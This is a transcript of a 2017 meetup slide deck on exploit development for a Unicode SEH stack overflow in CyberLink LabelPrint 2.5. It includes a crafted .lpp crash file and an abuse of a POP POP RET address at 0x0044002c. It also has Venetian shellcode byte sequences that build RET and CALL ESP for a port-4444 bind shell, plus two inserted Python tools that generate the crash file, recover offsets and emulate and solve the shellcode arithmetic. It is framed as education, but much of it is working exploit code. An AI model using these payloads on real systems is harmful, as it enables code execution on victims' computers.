cyberlink labelprint 2.5 exploitation process

Exploit Development Cyberlink LabelPrint 2.5 Unicode Stack Overflow IT Audit & IT Security Meetup #4 - Sharing in the Cloud Indonesian Cloud, Jakarta, 13 October 2017

Upload: thomas-gregory

Post on 22-Jan-2018



TRANSCRIPT

Page 1: CyberLink LabelPrint 2.5 Exploitation Process

Exploit Development: Cyberlink LabelPrint 2.5 Unicode Stack Overflow

IT Audit & IT Security Meetup #4 - Sharing in the Cloud

Indonesian Cloud, Jakarta, 13 October 2017

Page 2:

Who?

Thomas Gregory - @modpr0be

IT Security consultant @Spentera

Security researcher (occasionally)

focus on Windows exploitation

IT Security trainer (sometimes)

f3ci - ????

Security researcher

Penetration tester, red team

Appsec & simple exploit dev

Page 3:

What?

CyberLink LabelPrint 2.5

Labeling software

Embedded by default in the CyberLink Power2Go installation.

Included as bloatware in all Lenovo, HP and Asus laptops shipped somewhere between 2015 and 2016.

Page 4:

Why?

The exploit development is quite challenging and interesting.

We want to share it for education purposes only.

Page 5:

Let's Begin: THE FUZZ

Page 6:

Fuzzing possibilities

File Input

import

open media

open project

Registry overflow

Page 7:

Tools

Immunity Debugger

with mona plugin

Editor/IDE

/me using sublime text

Page 8:

LabelPrint Project

Project file with extension .lpp

Header

<PROJECT version="1.0.00">

<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">

<TRACK name="" />

Page 9:

The Bug

The overflow is in the name attribute of the TRACK tag:

<PROJECT version="1.0.00">

<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">

<TRACK

name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAA" />

</INFORMATION>

</PROJECT>
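The crash file above is easy to regenerate by hand, but finding the exact offset of the SEH record is less obvious once the input is converted to Unicode. The following script is an added example, not the talk's code and not the exploit-db script: it writes the .lpp project from page 8 with a Metasploit-style cyclic pattern in the TRACK name, models the UTF-16LE expansion the application applies (page 11: "AA" becomes 0x00410041), and maps the two DWORDs read from the overwritten next-SEH and SE handler fields back to an offset in the original pattern. Because each expanded DWORD holds only two pattern characters, both fields are combined into a four-character window, which is unique within the pattern. The file name crash.lpp and the offset 532 used in the demo are constructed for illustration and are not values from the talk.

```python
# Added example (not the talk's own code): build the .lpp crash file, model the
# UTF-16LE expansion, and recover the overflow offset from the SEH DWORDs.
import string
import struct
from itertools import product

LPP_TEMPLATE = (
    '<PROJECT version="1.0.00">\r\n'
    '<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">\r\n'
    '<TRACK name="{name}" />\r\n'
    '</INFORMATION>\r\n'
    '</PROJECT>\r\n'
)


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...). Every 3-byte window is unique
    within the first 20280 bytes, so any 4 consecutive bytes locate an offset."""
    chunks = []
    for up, low, dig in product(string.ascii_uppercase, string.ascii_lowercase, string.digits):
        chunks.append(up + low + dig)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def build_lpp(name):
    """Return the project file bytes with `name` in the TRACK name attribute."""
    return LPP_TEMPLATE.format(name=name).encode("ascii")


def unicode_expand(text):
    """What the application puts on the stack: every ASCII byte becomes XX 00."""
    return text.encode("utf-16le")


def dword_at(buf, offset):
    """Little-endian DWORD, the way Immunity Debugger shows a stack slot."""
    return struct.unpack_from("<I", buf, offset)[0]


def unicode_offset(pattern, nseh, seh):
    """Map the DWORDs read from the overwritten next-SEH and SE handler fields
    (e.g. 0x00410041) back to an offset in the ASCII pattern. Each expanded
    DWORD holds two pattern characters; the pair gives a unique 4-char window."""
    chars = ""
    for value in (nseh, seh):
        raw = struct.pack("<I", value)
        if raw[1] != 0 or raw[3] != 0:
            raise ValueError("0x%08x is not a Unicode-expanded value" % value)
        chars += chr(raw[0]) + chr(raw[2])
    idx = pattern.find(chars)
    if idx < 0:
        raise ValueError("%r not found in pattern" % chars)
    return idx


def simulate_crash(pattern, nseh_offset):
    """Constructed stand-in for the debugger: pretend the next-SEH field sits
    `nseh_offset` characters into the expanded name and read both DWORDs."""
    expanded = unicode_expand(pattern)
    return dword_at(expanded, nseh_offset * 2), dword_at(expanded, nseh_offset * 2 + 4)


if __name__ == "__main__":
    pat = cyclic_pattern(1000)
    with open("crash.lpp", "wb") as fh:          # file name is made up for the demo
        fh.write(build_lpp(pat))
    print("AA expands to 0x%08x" % dword_at(unicode_expand("AA"), 0))
    nseh, seh = simulate_crash(pat, 532)         # 532 is a made-up offset
    print("nSEH=0x%08x SEH=0x%08x -> offset %d" % (nseh, seh, unicode_offset(pat, nseh, seh)))
```

In practice you read the two DWORDs from the SEH chain view in Immunity Debugger (or from !mona findmsp) and pass them to unicode_offset; the offset it returns is the position in the ASCII input, which is what the exploit script needs to pad to.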

Page 10:

SEH Overwritten

Overwritten SE Handler

Page 11:

Unicode Based

The input is converted to Unicode (UTF-16LE) before it reaches the stack: "AA" (0x41 0x41) becomes 41 00 41 00 in memory, which the debugger shows as .A.A, i.e. the DWORD 0x00410041.

Page 12:

What is SEH?

A piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception (taken from corelan).

An exception is an event, which occurs during the execution of a program, that disrupts the normal flow of the program's instructions.

A catcher, who is trying to catch unusual behavior.

Page 13:

What is SEH?

This structure (also called a SEH record) is 8 bytes and has 2 (4-byte) elements:

a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable to handle the exception)

a pointer to the address of the actual code of the exception handler (SE Handler)

Page 14:

Abusing SEH

In other words, the payload must do the following things:

Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won't kick in.

Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode).

Overwrite the SE handler with a pointer to an instruction that will bring you back to the next SEH field and execute the jumpcode.

The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten "pointer to next SEH record" will jump to it.

Page 15:

Abusing SEH

When the exception occurs, the stack at handler entry looks like this:

Top of stack: return address, pointer to the exception record, pointer to our next-SEH field (the establisher frame).

A usable value to overwrite the SE Handler with is a POP something, POP something, RETN sequence. It POPs the address at the top of the stack, POPs again to remove the second address, and RETNs to the third address (which is now at the top of the stack).

That third address is the establisher frame pointer, i.e. the address of the overwritten "pointer to next SEH" field inside our supplied input buffer, so execution lands in bytes we control.

Page 16:

Abusing SEH

Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)

Page 17:

Unicode?

Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner.

Unicode based exploits usually involve file/folder naming, or the part of an input parameter that deals with naming.

Page 18:

More Info

Structured Exception Handler (SEH)

https://msdn.microsoft.com/en-us/library/windows/desktop/ms680657(v=vs.85).aspx

https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

https://blog.spentera.com/2011/09/14/seh-based-stack-overflow-the-basic/

Unicode based exploit

https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/

Page 19:

SEH + Unicode = Venetian. Probably the most hated combination.

Page 20:

Venetian Shellcode

One of the registers must point at the beginning of the shellcode.

One register must point at a memory location that is writeable (and where it's ok to write the newly reassembled shellcode).

Normal venetian prepend shellcode:

Push a register that points near our buffer (here ESI) onto the stack (ESP)

Pop it from the stack (ESP) into EAX

Align the EAX register with add/sub instructions

Push the EAX register onto the stack (ESP)

RET (return to the beginning of the shellcode at EAX)

Sadly, we won't face a normal venetian approach.

Page 21:

Typical Venetian Unicode

Prepend Opcode

Align EAX Register

• If we use EAX as BufferRegister, we need to align EAX to point to our buffer

"Stack Walking"

• Walk over the Next SEH and SEH.

RET to Shellcode

• Shellcode executed

Page 22:

Typical Venetian Unicode

Prepend Opcode (uses EAX as the BufferRegister; the add/sub values depend on where our buffer is):

ven = "\x56" #push esi
ven += "\x41" #align (with the trailing null becomes 00 41 00 = add byte ptr [ecx+0],al, so ECX must point to writable memory)
ven += "\x58" #pop eax
ven += "\x41" #align
ven += "\x05\x04\x01" #add eax,01000400 (expands to 05 00 04 00 01 00)
ven += "\x41" #align
ven += "\x2d\x01\x01" #sub eax,01000100 (net effect: eax += 0x300)
ven += "\x41" #align
ven += "\x50" #push eax
ven += "\x41" #align
ven += "\xc3" #ret

Page 23:

Problem?

Limited instructions (because of Unicode).

We need to find a POP POP RET whose address is Unicode friendly.

All byte values between 0x80 and 0xFF are bad characters.

Yes, the RET opcode (C3) is also in the bad character list.

Meanwhile, our venetian shellcode needs a RET (the typical venetian prepend ends with one).

Page 24:

Sh*t!

Page 25:

Solution

Find a Unicode friendly PPR (pop pop ret) address somewhere in a library or the executable.

Create "our version" of RET: since C3 cannot appear in the input, build it in a register with Unicode friendly arithmetic and write it onto the stack at runtime.

Fill the stack (ESP) with our shellcode.

Point our RET at the address of a CALL ESP instruction. This alters the flow of execution into the shellcode.

EAX must be pointing to the beginning of our shellcode.

"Stack walk" until we meet the shellcode.

Page 26:

Our Venetian Unicode Shellcode (flow)

1. Align the EAX register
2. Calculate where the RET will be placed
3. Construct the RET opcode in EAX
4. Calculate EAX for the CALL ESP opcode
5. Reach the RET, execute CALL ESP
6. Re-align EAX
7. "Stack walk" to the shellcode
8. Bind shell on port 4444

Page 27:

pop pop ret

!mona seh

Fortunately, we found one Unicode friendly address (0x0044002c) in the main program (LabelPrint.exe). It survives the conversion because it is written as the two bytes "\x2c\x44", which expand to 2c 00 44 00.

Page 28:

Construct RET (1)

Calculate the value of the EAX register, preparing the address where we want the decoded RET to be placed later on the stack.

Limited calculation (because of Unicode).

Zero the EAX register first (conceptually xor eax,eax; its encoding 33 C0 contains a bad character, so the actual zeroing on page 32 is done with two AND instructions).

Page 29:

Construct RET (2)

Preparing the address where we will push our RET:

push esp
pop eax
add EAX with 01001B00, then sub EAX with 01000100 (net +0x1A00)
push EAX
pop ESP

ven += "\x42" #nop (00 42 00 = add byte ptr [edx+0],al; EDX must point to writable memory)
ven += "\x54" #push esp
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x1B\x01" #add eax,01001B00
ven += "\x42" #nop
ven += "\x2d\x01\x01" #sub eax,01000100
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" #nop
ven += "\x5c" #pop esp

Page 30:

Construct RET (3)

After the calculation in EAX, the stack pointer (ESP) now points at 0x0012F655 (the same value as EAX).

This is important for our RET decoding address later.

Page 31:

Construct RET (4)

Page 32:

Zeroing Out EAX

We need to clear the EAX register for the next calculation of the RET opcode.

After EAX is zeroed out we can calculate the EAX register to 0xC300C300 (two RET opcodes).

We can perform the zeroing with two AND instructions whose masks have no bits in common, so the result is 0 whatever EAX held:

AND EAX with 7e007e00

AND EAX with 01000100

Page 33:

Zeroing Out EAX

ven += "\x42" #nop
ven += "\x25\x7e\x7e" #and eax,7e007e00
ven += "\x42" #nop
ven += "\x25\x01\x01" #and eax,01000100

Page 34:

Construct RET (5)

Preparing the RET opcode:

Zero out EAX first (done)

XOR EAX with 7f007f00

ADD EAX with 44004400 (0x7f007f00 + 0x44004400 = 0xC300C300)

PUSH EDI (padding)

PUSH EAX

Page 35:

The RET Opcode (1)

ven += "\x35\x7f\x7f" #xor eax,7f007f00
ven += "\x42" #nop
ven += "\x05\x44\x44" #add eax,44004400 -> eax = C300C300
ven += "\x42" #nop
ven += "\x57" #push edi/padding
ven += "\x42" #nop
ven += "\x50" #push eax (writes C3 00 C3 00 onto the stack)
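The register arithmetic on pages 29 to 35 is easy to get wrong by one byte, and every mistake costs a debugger round trip. The script below is an added example, not the talk's code and not the exploit-db script: it expands a sequence of ASCII bytes to UTF-16LE the way LabelPrint does, decodes the small x86 subset the deck uses (push/pop, inc, add/sub/and/xor eax,imm32, and the 00 xx 00 filler that the deck calls a nop and that actually decodes as add byte ptr [edx+0],al, which is why EDX must point to writable memory), and tracks EAX, ESP and the stack. It also includes a solver that finds a Unicode friendly add/sub immediate pair for a wanted EAX delta (the +0x1A00 on page 29 and the +0x200 on page 41) and a check that an address such as page 27's 0x0044002c survives the expansion. Assumptions: the starting ESP value 0x0012DC55 is chosen only so that the alignment reproduces the 0x0012F655 reported on page 30, the EDI value is made up, and the emulation starts at the push esp, i.e. the null of the instruction before the leading \x42 filler has already been consumed, as the deck's comment layout implies.

```python
# Added example (not the talk's own code): emulate the Venetian sequences from
# pages 29-35 after UTF-16LE expansion and solve for Unicode-friendly immediates.
import struct

MASK = 0xFFFFFFFF
REG = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
ALU = {0x05: "add", 0x2D: "sub", 0x25: "and", 0x35: "xor"}   # <op> eax, imm32
ALLOWED = set(range(0x01, 0x80))   # deck: 0x00 and 0x80-0xFF are bad chars
ORDER = sorted(ALLOWED)


def check_chars(ascii_bytes):
    bad = sorted({b for b in ascii_bytes if b not in ALLOWED})
    if bad:
        raise ValueError("bad chars: " + " ".join("%02x" % b for b in bad))


def run(ascii_bytes, regs):
    """Execute the expanded form of `ascii_bytes`; returns (regs, stack, writes).
    `writes` lists the base register of every 00-xx-00 filler instruction
    (add byte ptr [reg+0], al); each one must point to writable memory."""
    check_chars(ascii_bytes)
    code = ascii_bytes.decode("latin-1").encode("utf-16le")
    regs, stack, writes, ip = dict(regs), {}, [], 0
    while ip < len(code):
        op = code[ip]
        if op == 0x00:                          # the Unicode "nop"
            if ip + 3 > len(code):
                break                           # trailing null, nothing follows
            modrm = code[ip + 1]
            if modrm >> 6 != 1 or modrm & 7 == 4:
                raise ValueError("unsupported modrm %02x at %d" % (modrm, ip))
            writes.append(REG[modrm & 7])
            ip += 3
        elif op in ALU:
            imm = struct.unpack_from("<I", code, ip + 1)[0]
            a = regs["eax"]
            regs["eax"] = {"add": a + imm, "sub": a - imm, "and": a & imm, "xor": a ^ imm}[ALU[op]] & MASK
            ip += 5
        elif 0x50 <= op <= 0x57:                # push reg (value before ESP moves)
            value = regs[REG[op - 0x50]]
            regs["esp"] = (regs["esp"] - 4) & MASK
            stack[regs["esp"]] = value
            ip += 1
        elif 0x58 <= op <= 0x5F:                # pop reg (pop esp loads the popped value)
            value = stack.get(regs["esp"], 0)
            regs["esp"] = (regs["esp"] + 4) & MASK
            regs[REG[op - 0x58]] = value
            ip += 1
        elif 0x40 <= op <= 0x47:                # inc reg
            regs[REG[op - 0x40]] = (regs[REG[op - 0x40]] + 1) & MASK
            ip += 1
        else:
            raise ValueError("unsupported opcode %02x at %d" % (op, ip))
    return regs, stack, writes


def add_sub_pair(delta):
    """Immediates A, S with (A - S) mod 2^32 == delta for `add eax,A; sub eax,S`,
    where A = a2<<24 | a1<<8 and S = s2<<24 | s1<<8 after expansion. Only deltas
    whose low byte is zero are reachable; returns None otherwise."""
    delta &= MASK
    for a1 in ORDER:
        for s1 in ORDER:
            rest = (delta - ((a1 - s1) << 8)) & MASK
            if rest & 0xFFFFFF:
                continue
            hi = rest >> 24                     # needed (a2 - s2) mod 256
            for a2 in ORDER:
                s2 = (a2 - hi) & 0xFF
                if s2 in ALLOWED:
                    return (a2 << 24 | a1 << 8), (s2 << 24 | s1 << 8)
    return None


def emit_add_sub(delta, filler=0x42):
    """ASCII bytes for the add/sub pair, in the deck's layout (filler between)."""
    A, S = add_sub_pair(delta)
    return bytes([0x05, (A >> 8) & 0xFF, A >> 24, filler, 0x2D, (S >> 8) & 0xFF, S >> 24])


def unicode_friendly(addr):
    """The two ASCII bytes that expand to `addr`, or None (page 27 check)."""
    raw = struct.pack("<I", addr)
    if raw[1] or raw[3] or raw[0] not in ALLOWED or raw[2] not in ALLOWED:
        return None
    return bytes([raw[0], raw[2]])


# Page 29 (from the push esp): align, net eax += 0x1A00, then esp = eax.
ALIGN = b"\x54\x42\x58\x42\x05\x1B\x01\x42\x2d\x01\x01\x42\x50\x42\x5c"
# Pages 33-35: zero eax, build C300C300, push padding and the RET bytes.
BUILD_RET = b"\x42\x25\x7e\x7e\x42\x25\x01\x01\x42\x35\x7f\x7f\x42\x05\x44\x44\x42\x57\x42\x50"


def venetian_ret_demo(esp0=0x0012DC55, edi=0x11111111):
    """esp0 is a made-up start chosen to reproduce the deck's 0x0012F655."""
    regs = {r: 0 for r in REG}
    regs.update(esp=esp0, edi=edi, eax=0xDEADBEEF)
    return run(ALIGN + BUILD_RET, regs)


if __name__ == "__main__":
    regs, stack, writes = venetian_ret_demo()
    print("eax=0x%08x esp=0x%08x [esp]=0x%08x" % (regs["eax"], regs["esp"], stack[regs["esp"]]))
    print("filler writes through:", sorted(set(writes)))
    print("add/sub for +0x1A00:", emit_add_sub(0x1A00).hex())
    print("0x0044002c as bytes:", unicode_friendly(0x0044002C))
```

Run it before touching the debugger: if the final EAX is not 0xC300C300, or the stack slot at ESP does not hold it, the immediates are wrong; and if writes names a register other than the one you have pointed at writable memory, the filler itself will fault.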

Page 36:

The RET Opcode (2)

Page 37:

Construct CALL to ESP (1)

Page 38:

Construct CALL to ESP (2)

Page 39:

Construct CALL to ESP (3)

Page 40:

Stack Walk to Shellcode

Page 41:

Our Venetian Shellcode

ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x10\x01" #add eax,01001000, align eax to our buffer
ven += "\x42" #nop
ven += "\x2d\x0e\x01" #sub eax,01000e00, align eax to our buffer (net +0x200)
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" #nop
ven += "\x5C" #pop esp
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x53\x7c" #add eax,7c005300, part of call esp
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" * 68 #padding to fill the stack
ven += "\x7b\x32" #part of call esp

Page 42:

Final Exploit: https://www.exploit-db.com/exploits/42777/

Page 43:

Solution

For now, do not use CyberLink LabelPrint.

Page 44:

Thank you

[email protected]